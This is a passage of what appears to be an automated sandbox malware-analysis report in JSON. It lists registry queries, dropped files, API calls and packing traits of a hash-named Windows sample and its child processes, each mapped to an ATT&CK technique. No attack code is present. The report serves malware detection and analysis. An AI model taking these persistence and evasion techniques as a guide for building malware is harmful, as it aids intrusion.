\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"muniw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\muniw.exe]- [targetUID: 00000000-00004108]\n \"_vslite.bat\" has type \"ASCII text with CRLF line terminators\"- Location: [%TEMP%\\_vslite.bat]- [targetUID: 00000000-00004108]\n \"golfinfo.ini\" has type \"Non-ISO extended-ASCII text with very long lines (512) with no line terminators\"- Location: [%TEMP%\\golfinfo.ini]- [targetUID: 00000000-00005756]\n \"gbp.ini\" has type \"ISO-8859 text with no line terminators\"- Location: [%TEMP%\\gbp.ini]- [targetUID: 00000000-00004108]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"bauqs.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"xyzuqi.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00005920)\n \"bauqs.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00005756)\n \"bauqs.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15784020'}\" (UID: 00000000-00005756)\n \"xyzuqi.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15784020'}\" (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15784052'}\" (UID: 00000000-00004108)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864912'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861600'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864952'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861640'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864992'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861680'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5865032'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861720'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5865112'}\" (UID: 00000000-00001844)\n \"muniw.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861800'}\" (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"muniw.exe\" called \"FindResourceW\" with parameter \"24521804\" - (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-121", "type": 6, "relevance": 3, "name": "Calls an API typically used to remove a directory", "description": "\"cmd.exe\" called \"RemoveDirectoryW\" with parameter 43003a00 (UID: 00000000-00005740)\n \"cmd.exe\" called \"RemoveDirectoryW\" with parameter %LOCALAPPDATA%\\Temp (UID: 00000000-00000568)", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".text\" is zero\n Raw size of \".?xL\" is zero\n Raw size of \".reloc\" is zero\n Raw size of \".htext\" is zero\n Raw size of \".-(H\" is zero\n Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100382c2c437265617465546f6f6c68656c703332536e617073686f742c6b65726e656c33322e646c6c2c223235323a30323a34342e313638222c52583d302c50583d300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1177e8be0d0100f0fd7f9a5cc77700e0fd7fb0aa120044f0fd7f00000000400000003f0000001d00000000f0fd7fa4aa1200c15cc7776082ce771d00000000f0fd7f9a5cc77700e0fd7fc8aa12005789c6778083ce771317c875d8eb1177 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005920)\n \"bauqs.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100007000700044006100740061005c004c006f00630061006c005c00540065006d0070005c00620061007500710073002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb117710792c0000d0fd7f9a5cc77700f0fd7f10bf120044d0fd7f00000000400000003f0000001d00000000d0fd7f04bf1200c15cc7776082ce771d00000000d0fd7f9a5cc77700f0fd7f28bf12005789c6778083ce771317c875d8eb1177 (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"xyzuqi.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1177a8dc290000f0fd7f9a5cc77700e0fd7fa0c2120044f0fd7f00000000400000003f0000001f00000000f0fd7f94c21200c15cc7776082ce771f00000000f0fd7f9a5cc77700e0fd7fb8c212005789c6778083ce771317c875d8eb1177 (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004108)\n \"muniw.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000044f4120002000000000000001000000084f31200a0f31200c976c7750000250000001400da76c775661f7408000000000000626901000000935cc77700000000000000000000000068f312000100000038f61200bd06c975269aa17d00000000bd14626948c82800 (UID: 00000000-00001844)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"IsWow64Process\" with parameter \"5920\" - (UID: 00000000-00005920)\n \"bauqs.exe\" called \"IsWow64Process\" with parameter \"5756\" - (UID: 00000000-00005756)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"5740\" - (UID: 00000000-00005740)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000a0100000000582f0a01000000009c00000000000000302f0a0130000000407e0d0100000000b0000000000000008000000000000000000000000000000000000000000000000200000258b10c01cf0700c8000000000000000000000000ff0700000000000035400075e80f0d010100000000000000020000000c00000040f00c0140f00c013bf00c01000000000000000000000a0100000001a0fd12000000000078ff120095e1c277b0270700feffffff435cc6775059c67794000000a00000003af00c0138f00c019400000000000000fdfe36770000000018000000b9a93af1 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600501a2af148bf12006d820076dc200e0104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000360039006100310032003500650062006100650036003100330062003900650039003200330065006100660032003900380039003500620033003300610066006400350034006400330034003900320035006300630030003600630035006400330065002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bc677689cd377d8eb1177ac010a0100000a0100000000000000000400e8007d070000000000000000000000000000000000000500e3007d0700000000000000000000606f0a0100000000200000000000000000000000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d8200768455100104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d820076d41c110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a017c23000094b8120067e5c37700000a01002411000000000000000a010000000000241101000000002823000b80000000a8261101c4000a01385a1001003b000000000a0100000000002411018010000000000a01f8201101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d820076d41d110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a015c23000094b8120067e5c37700000a01002511000000000000000a010000000000251101000000000823002b80000000a8271101c4000a01385a1001003b000000000a0100000000002511018010000000000a01f8211101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d820076041f110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a013623000094b8120067e5c37700000a01302611000000000000000a01000000003026110100000000e22200c080000000d8281101c4000a01385a1001003b000000000a0100000000302611018010000000000a0128231101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d8200763420110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a011023000094b8120067e5c37700000a01602711000000000000000a01000000006027110100000000bc22009e80000000082a1101c4000a01a05a1001003b000000000a0100000000602711018010000000000a0158241101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d8200765c21110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001101f83b0000ff07000000000a01000000007f070000c4000a01302f0a01eb22000094b8120067e5c37700000a01882811000000000000000a01000000008828110100000000972200b580000000302b1101c4000a01385a1001003b000000000a0100000000882811018010000000000a0180251101f83b0000ff07000000000a01000000007f070000c4000a017b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007c1c2af124b912006d8200768c22110104010000 (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"RtlGetVersion\" with parameter 